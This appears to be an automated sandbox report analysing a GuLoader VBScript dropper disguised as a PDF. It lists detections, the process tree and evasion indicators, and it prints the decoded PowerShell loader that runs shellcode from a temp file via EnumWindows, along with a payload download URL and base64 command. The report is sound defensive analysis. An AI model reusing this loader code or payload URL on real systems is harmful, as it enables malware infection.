

Windows Analysis Report
doc_65398086_4190362045539.pdf.vbs

Overview

General Information

Sample Name: doc_65398086_4190362045539.pdf.vbs
Analysis ID: 625179
MD5: 2fc6f3477035823ff7864187b5b2a5cc
SHA1: 8e6db7c18a5725e795d7421baf84cae637fbcc53
SHA256: 74e1b9fa91b0840706b7418b8604d76efab886fec1704b8810ad389aa6a9cb9b
Tags: GuLoader, vbs

Detection

GuLoader
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
C2 URLs / IPs found in malware configuration
Potential malicious VBS script found (has network functionality)
Encrypted powershell cmdline option found
Very long command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges

Classification

  • System is w10x64
  • wscript.exe (PID: 7096 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\doc_65398086_4190362045539.pdf.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 5504 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "# Instru9 SBEURTERNE Slan Spontan7 UNCALL embo reit Tarpape ugiftesd BACKSTAIR egoityh Smed UROGEN vasorrhap Ametro PARAPHRAST Krymmelloc2 INTERSPIR Unsque6 jacobitis PHONOPH Absconders7 Chikitaops SKYGG DOMMEDAGS nonassista Archche tviv Kaprifoli Finansti
 # Trippets Mlke2 nonexplor FOLKECE Arveflge FASTPRISSY Hoggw6 Repet4 HALVONKLE Arbejds PLOTTER Tsed
 # Dynamikken7 STKYSTT Hydronit5 redistri mericar vipp Fabr1 FLOVMA AANDSHO Staalstu JESUI Tana Commo Guapino Synkron7 devlinret Omstningsg Rese2 metrolo SUGENEKDBO Svirpetsum1 hydrater OBSERVA TEMPANA VIKINGER upriveeks heartb Embed UNASSEN OPKLA eebreere Picritic3
 # EELIEST Crystalog1 DUSINME Indiv8 udskriftsp Teknokra1 tyndtf Elevtime6 dyksv bonboners anticapit under vier YDERP Klbebaand9 Vipst4 Maximon Appraise4 ARTIGER
 # UDSKRIDN zitas spank Tipperho6 scrol Fnisr FRASIGE dieticia haan Spaamnds1 servi Ledsagemu Underkendt7 Sandp4 kapslerbas disr PROP rosse Forkla9
 # Transistor1 WARD Domsfo3 BAJADSEN KARAKTERB chlo Isoc Orontium3 Equippe7 Epigramr Mattispu Shoppinge RETI DEORSUMV almu Gravhu Forsg8 THIR LITOGRAFRA Stra distri SPLICEAB gritmedi lseadga KATAPU mani Parenthoo udsvi
 # Samlivs5 ambi urootwos Resistingl7 transporta spejling NATIONAL Endeven6 ROLLE Unintell6 mode Sectionall7 Unser9 Ferryslo
 # TANDBR frio Tillid7 Progyp9 HAVEBR maugerass bemalingco Heteromorp2 Snapre ABNE Lysdd Under
 # MULLEINS Magdal4 NONCRYST Hoejr5 BUNINGE SWIDG forpagt TYPEGOD SMAAPARTI UNDERSKOVD Skoleg arusha coat Bekymre5 sniggerera NABO VATTETS Parat6 RABAT Misdescrib PENSI Tamra8 PRVELS
 # Tobantih5 potoroosik Dorsoint anfa Quadrire kilovare BLANKLAKS HAFF Traekvogne SIGN Resci pantendesa Radialgad3 embroider Tolrer1 Leviga Skru5 Afladeen Ungla9 Aerosole3
 # Afrikande Medl4 obst anstde accelerati silic Indekl3 Kneblinge Notodon Pacunons Bariumm Unde6 pola booboosha Dextrorot Tawieopera Cressyruts Textuistb6 Mazh Micr differenc NONSCHIS Inohes6 HILDIMITA Metain anticy
 # Epildodec Upblowphyl pretreat reacc Yellow substra STABI FROST Trestlefra
 # preexti SRINTE Skamfil3 Halkahsmid Aleben telefon Saaterpal TWEN Drtrs6 REMO AMPHIC
 # Brov4 Bagperron SHADOWLIKE Moeursfl Usandhe5 Stiftsfr Sepionopf2 Stengallen5 Tviv9 vialmake Arbe Repil9 Authv Blea8 Foto6 bankdire Oede1 puyal Depres3 CANN
 # Under Viskei8 Sexivalenc Pundi kravme Decalc Goldcup Impe1 UDPEGESOPS tinsyko essentia Storh3 Virksom OKAPISSTRI Monetite7 SYRINGENS Konfusione9 Tomerwheel3 HAVENERSH Brai
 # KONFITURE Foothold BILBOQUET Shiftable9 Outs venstreli FLADSYN GENERALS SNOGES MITUOPST SIDT Troldd Cardi mens rnnebo XXXVI addstol parb Salm HYLAGY Tilsnige9 Doucepe1 Rarefi3 Poss Nonaryopt Photoradi Meda2 equinox AMBULATI ALGEBRA Intrans
 # WOODR Mini Forhin Vlgerneco RATA vulpi Omvurderi OBSERVATI Tubbero Type2 HORNPIPEIC grund frys nonlarceno tito Scenariete Parapr3 Adsc7 STRAFUD Nedrakk MAILABILI Smaaligh SKEHEJRE Afgangs BEARDE BENG federac kldebrst vovs
 # barom Luftfart3 teles CHALO Unifiessa Skraapa Unad nasali lauge Forvask4 Bataterneo7
 # PAUCI forhoe Disro Debouchme9 Tele2 Colludeboa4 CELIOSCH Tilkendt Aphor Combinddop DISPERSION Kontinuati2 Unclerkli2 FULDTID Toxot6 Rankness Monotyp6 Neuro4 neurophil helstens STRAPNIN Hude3 OEVRE
 # tomc KONFORM Citronpres Positively HEMOM Skgp9 sprogu Antim SNOOPER Isoterei7 CURLIEWURL fags
 # AFTE Dreje Bifangstma Irrecogn4 CBCMSMUD ssonsvin Rand2 Vederhfti3 nonanalo ceruleit Dgncen arthe Finans Fruefrak PALMEB Saamask Optante Lochios Sejrsfane7 Frontingl7 POKAL DINB diss vatf Tarzanu7 electroga VIZARD inte Anven Catechi7
 # DROSSELK FARVEHANDL TEKSTBEHA Spedit7 Gesturap8 Breechedbo7 dissent HINGE KONDICYKLE tank fagotte Vulturous Kohlan3 Trium BOSSAGE katastro Mozamb5 tuningsst Acftm Bakkenbar6 afst Afstning Brobue6 Sapph
 # SCLE GRANITTERN Manane6 Emprisepa6 urugua Smaa8 Nonpapis4 KLASSI svagh
 # OVERNI ster TEIIDAE UNGTJEN Contractiv unequita Gaspa ZOOMECHA OVERPOPULO CERT Liqfrap2 IMPROV jacturask Slowcoac BLADSYS unclasp KAGEK SEMMESSKOR VOLCANIZ antis Kontor6 BUTIKSCEN Should4 Miljadmi2 Uredino1 gallonst
 # AFKA STYRINGSMI Univers5 Mainvicki6 BLOKH GEJLEROSS bisse Udhul Klunkvip2 Struthbr1 vers ORIGINALFR Mani3 Outribb6
 # mejetcha Sikk kernellin Bibliogr Gadeh smok Barfodedes8 returnerin Scapeless squal Konfo1 GLUTI Rigetsfar5 OBSERVA Alimentat
 # Genn Pand GOLDENWING Redningsho UDFRIEL Bearabili Medl Tempoersfi Spiritus5 stran FLOPPYD unaadigt MASKEPR Besvego Ljtn Hystr patentret Tidsf3 torid lilapleach Schood6 Toile9 Opsummere8 Scir3 Hydrorhiza UNDSIG GUNJBRA Irettestte7
 # UNAPPR MINE Pain FORU PRESERV bagstrb Unnarc unimpugne Landejendo Trolder8 Opby ENTREDR Lngodtgre MARRY vgtf Cloturin7 slyngelstr


 Add-Type -TypeDefinition @"
 using System;
 using System.Runtime.InteropServices;
 public static class ROTATIONFO1
 {
 [DllImport("gdi32")]public static extern IntPtr EnumFontsA(string ferskva,uint parapleg,int DEPO,int ROTATIONFO0,int Hove,int afterrak,int Svinghjule1);
 [DllImport("KERNEL32", EntryPoint="CreateFileA")]public static extern IntPtr Viac([MarshalAs(UnmanagedType.LPStr)]string ferskva,uint parapleg,int DEPO,int ROTATIONFO0,int Hove,int afterrak,int Svinghjule1);
 [DllImport("ntdll")]public static extern int NtAllocateVirtualMemory(int ROTATIONFO6,ref Int32 TERRA,int Maniokp,ref Int32 ROTATIONFO,int Phonolo,int ROTATIONFO7);
 [DllImport("KERNEL32", EntryPoint="ReadFile")]public static extern int CDAC(int Maniokp0,uint Maniokp1,IntPtr Maniokp2,ref Int32 Maniokp3,int Maniokp4);
 [DllImport("USER32")]public static extern IntPtr EnumWindows(IntPtr Maniokp5,int Maniokp6);

 }
 "@
 # Rubinemagt5 Mykiss Steno3 UDDANNELSE EXACTNE Laur Mooni1 ADJO Bemur1 INST Adjust Frerprve9 Hjertebar Flut Hedenskram Burmannia muham Begy Huahukulis8 Bagbu2 WARS Maskedbtt dryps stoppeg Swee5 SODF barr Mangersfla9
 $ROTATIONFO2="$env:temp" + "\rettetast.dat"
 # nonhered inkasso Fuldb Selvang Gnidde2 SURMO BODHISATT QUIS ensrettend cryptodire Homeroomp SPARENDESP Antilit EBULL Forb Vildfa2 Minaea1 sygdomforn Almindel DRUES
 $ROTATIONFO3=0;
 $ROTATIONFO9=1048576;
 $ROTATIONFO8=[ROTATIONFO1]::NtAllocateVirtualMemory(-1,[ref]$ROTATIONFO3,0,[ref]$ROTATIONFO9,12288,64)
 # Resu5 Skldte3 MAGNETISM Kalku8 Aesc DORESTA Goalpo natbor Synergetic4 Gynandra1 Klavi WANLA Gela miljber Tolseyl epipl WORSH Colem Annu1 LEVIGATIN stabsoffi iron ublufrdig
 $ROTATIONFO4=[ROTATIONFO1]::Viac($ROTATIONFO2,2147483648,1,0,3,128,0)
 # PUMPERNI BREP RENNESI Babbo Stylt Nazismesca3 latenedra ALGEBRAIS Kettqui Pneuma Afgift templo SKINDKAAB Fernisere1 rectifie RADIOA glosso betalingse Friture2 subethat memo Udarbejde3
 $ROTATIONFO5=0;
 # Svelni TERRESTRIA Grumme RYDHANDG Seconde2 requi MERSTIGN Embryona Korsvejtr3 isdkked Subbas4 vellabagb nonfer Virtuos KROPSS KALF Amtsraadsf6
 [ROTATIONFO1]::CDAC($ROTATIONFO4,$ROTATIONFO3,57933,[ref]$ROTATIONFO5,0)
 # DZOTOMMESK Udskring Semiam6 Purlg syttena Hydr Eurasieren Mult3 Unswin Advok8 Marinesta Tend Pelvesruat4 inddatafil Akademis1 GARUDA Eventu1 PRESENTIM Divul7 Spildeva Styrke Fototel Autot5 EART Hydragogy Brinceu9 Triplu unorales Skele
 [ROTATIONFO1]::EnumWindows($ROTATIONFO3, 0)

 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4164 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 5012 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBAD5.tmp" "c:\Users\user\AppData\Local\Temp\wwh3pdnv\CSC196797DCDE8F47A0A151AAD0920D1B.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
{"Payload URL": "https://vegproworld.com/wp-content/Medalj.vbs"}
Source | Rule | Description | Author | Strings
0000000E.00000002.894432907.0000000008F80000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
    No Sigma rule has matched
    No Snort rule has matched



    AV Detection

    Source: 0000000E.00000002.894432907.0000000008F80000.00000040.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "https://vegproworld.com/wp-content/Medalj.vbs"}
    Source: doc_65398086_4190362045539.pdf.vbs | Virustotal: Detection: 18%
    Source: doc_65398086_4190362045539.pdf.vbs | ReversingLabs: Detection: 19%
    Source: Binary string: k;C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.pdb source: powershell.exe, 0000000E.00000002.887326067.0000000004919000.00000004.00000800.00020000.00000000.sdmp

    Networking

    Source: Malware configuration extractor | URLs: https://vegproworld.com/wp-content/Medalj.vbs
    Source: Initial file: fagb1.SaveToFile FileName, adSaveCreateOverWrite
    Source: powershell.exe, 0000000E.00000002.885692627.0000000004571000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 0000000E.00000002.887074953.0000000004809000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro

    System Summary

    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
    Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 18956
    Source: doc_65398086_4190362045539.pdf.vbs | Initial sample: Strings found which are bigger than 50
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_07A3A0F8
    Source: C:\Windows\System32\wscript.exe | Process Stats: CPU usage > 98%
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process Stats: CPU usage > 98%
    Source: doc_65398086_4190362045539.pdf.vbs | Virustotal: Detection: 18%
    Source: doc_65398086_4190362045539.pdf.vbs | ReversingLabs: Detection: 19%
    Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\doc_65398086_4190362045539.pdf.vbs"
    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBAD5.tmp" "c:\Users\user\AppData\Local\Temp\wwh3pdnv\CSC196797DCDE8F47A0A151AAD0920D1B.TMP"
    Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:640:120:WilError_01
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20220512
    Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user~1\AppData\Local\Temp\rettetast.dat
    Source: classification engine | Classification label: mal88.troj.evad.winVBS@8/9@0/0
    Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: Binary string: k;C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.pdb source: powershell.exe, 0000000E.00000002.887326067.0000000004919000.00000004.00000800.00020000.00000000.sdmp

    Data Obfuscation

    Source: Yara match | File source: 0000000E.00000002.894432907.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_07A3564A push eax; mov dword ptr [esp], edx
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_07A39E70 push eax; mov dword ptr [esp], edx
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_07A31DBE push esi; ret
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.dll

    Hooking and other Techniques for Hiding and Protection

    Source: Possible double extension: pdf.vbs | Static PE information: doc_65398086_4190362045539.pdf.vbs
    Source: C:\Windows\System32\wscript.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
    Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1160
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5984Thread sleep time: -11068046444225724s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5984Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wwh3pdnv\wwh3pdnv.dll
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
    Source: powershell.exe, 0000000E.00000002.886458103.0000000004701000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: k:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: powershell.exe, 0000000E.00000002.886458103.0000000004701000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Instru9 SBEURTERNE Slan Spontan7 UNCALL embo reit Tarpape ugiftesd BACKSTAIR egoityh Smed UROGEN vasorrhap Ametro PARAPHRAST Krymmelloc2 INTERSPIR Unsque6 jacobitis PHONOPH Absconders7 Chikitaops SKYGG DOMMEDAGS nonassista Archche tviv Kaprifoli Finansti #Trippets Mlke2 nonexplor FOLKECE Arveflge FASTPRISSY Hoggw6 Repet4 HALVONKLE Arbejds PLOTTER Tsed #Dynamikken7 STKYSTT Hydronit5 redistri mericar vipp Fabr1 FLOVMA AANDSHO Staalstu JESUI Tana Commo Guapino Synkron7 devlinret Omstningsg Rese2 metrolo SUGENEKDBO Svirpetsum1 hydrater OBSERVA TEMPANA VIKINGER upriveeks heartb Embed UNASSEN OPKLA eebreere Picritic3 #EELIEST Crystalog1 DUSINME Indiv8 udskriftsp Teknokra1 tyndtf Elevtime6 dyksv bonboners anticapit under vier YDERP Klbebaand9 Vipst4 Maximon Appraise4 ARTIGER #UDSKRIDN zitas spank Tipperho6 scrol Fnisr FRASIGE dieticia haan Spaamnds1 servi Ledsagemu Underkendt7 Sandp4 kapslerbas disr PROP rosse Forkla9 #Transistor1 WARD Domsfo3 BAJADSEN KARAKTERB chlo Isoc Orontium3 Equippe7 Epigramr Mattispu Shoppinge RETI DEORSUMV almu Gravhu Forsg8 THIR LITOGRAFRA Stra distri SPLICEAB gritmedi lseadga KATAPU mani Parenthoo udsvi #Samlivs5 ambi urootwos Resistingl7 transporta spejling NATIONAL Endeven6 ROLLE Unintell6 mode Sectionall7 Unser9 Ferryslo #TANDBR frio Tillid7 Progyp9 HAVEBR maugerass bemalingco Heteromorp2 Snapre ABNE Lysdd Under #MULLEINS Magdal4 NONCRYST Hoejr5 BUNINGE SWIDG forpagt TYPEGOD SMAAPARTI UNDERSKOVD Skoleg arusha coat Bekymre5 snigg
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBJAG4AcwB0AHIAdQA5ACAAUwBCAEUAVQBSAFQARQBSAE4ARQAgAFMAbABhAG4AIABTAHAAbwBuAHQAYQBuADcAIABVAE4AQwBBAEwATAAgAGUAbQBiAG8AIAByAGUAaQB0ACAAVABhAHIAcABhAHAAZQAgAHUAZwBpAGYAdABlAHMAZAAgAEIAQQBDAEsAUwBUAEEASQBSACAAZQBnAG8AaQB0AHkAaAAgAFMAbQBlAGQAIABVAFIATwBHAEUATgAgAHYAYQBzAG8AcgByAGgAYQBwACAAQQBtAGUAdAByAG8AIABQAEEAUgBBAFAASABSAEEAUwBUACAASwByAHkAbQBtAGUAbABsAG8AYwAyACAASQBOAFQARQBSAFMAUABJAFIAIABVAG4AcwBxAHUAZQA2ACAAagBhAGMAbwBiAGkAdABpAHMAIABQAEgATwBOAE8AUABIACAAQQBiAHMAYwBvAG4AZABlAHIAcwA3ACAAQwBoAGkAawBpAHQAYQBvAHAAcwAgAFMASwBZAEcARwAgAEQATwBNAE0ARQBEAEEARwBTACAAbgBvAG4AYQBzAHMAaQBzAHQAYQAgAEEAcgBjAGgAYwBoAGUAIAB0AHYAaQB2ACAASwBhAHAAcgBpAGYAbwBsAGkAIABGAGkAbgBhAG4AcwB0AGkAIAANAAoAIwBUAHIAaQBwAHAAZQB0AHMAIABNAGwAawBlADIAIABuAG8AbgBlAHgAcABsAG8AcgAgAEYATwBMAEsARQBDAEUAIABBAHIAdgBlAGYAbABnAGUAIABGAEEAUwBUAFAAUgBJAFMAUwBZACAASABvAGcAZwB3ADYAIABSAGUAcABlAHQANAAgAEgAQQBMAFYATwBOAEsATABFACAAQQByAGIAZQBqAGQAcwAgAFAATABPAFQAVABFAFIAIABUAHMAZQBkACAADQAKACMARAB5AG4AYQBtAGkAawBrAGUAbgA3ACAAUwBUAEsAWQBTAFQAVAAgAEgAeQBkAHIAbwBuAGkAdAA1ACAAcgBlAGQAaQBzAHQAcgBpACAAbQBlAHIAaQBjAGEAcgAgAHYAaQBwAHAAIABGAGEAYgByADEAIABGAEwATwBWAE0AQQAgAEEAQQBOAEQAUwBIAE8AIABTAHQAYQBhAGwAcwB0AHUAIABKAEUAUwBVAEkAIABUAGEAbgBhACAAQwBvAG0AbQBvACAARwB1AGEAcABpAG4AbwAgAFMAeQBuAGsAcgBvAG4ANwAgAGQAZQB2AGwAaQBuAHIAZQB0ACAATwBtAHMAdABuAGkAbgBnAHMAZwAgAFIAZQBzAGUAMgAgAG0AZQB0AHIAbwBsAG8AIABTAFUARwBFAE4ARQBLAEQAQgBPACAAUwB2AGkAcgBwAGUAdABzAHUAbQAxACAAaAB5AGQAcgBhAHQAZQByACAATwBCAFMARQBSAFYAQQAgAFQARQBNAFAAQQBOAEEAIABWAEkASwBJAE4ARwBFAFIAIAB1AHAAcgBpAHYAZQBlAGsAcwAgAGgAZQBhAHIAdABiACAARQBtAGIAZQBkACAAVQBOAEEAUwBTAEUATgAgAE8AUABLAEwAQQAgAGUAZQBiAHIAZQBlAHIAZQAgAFAAaQBjAHIAaQB0AGkAYwAzACAADQAKACMARQBFAEwASQBFAFMAVAAgAEMAcgB5AHMAdABhAGwAbwBnADEAIABEAFUAUwBJAE4ATQBFACAASQBuAGQAaQB2ADgAIAB1AGQAcwBrAHIAaQBmA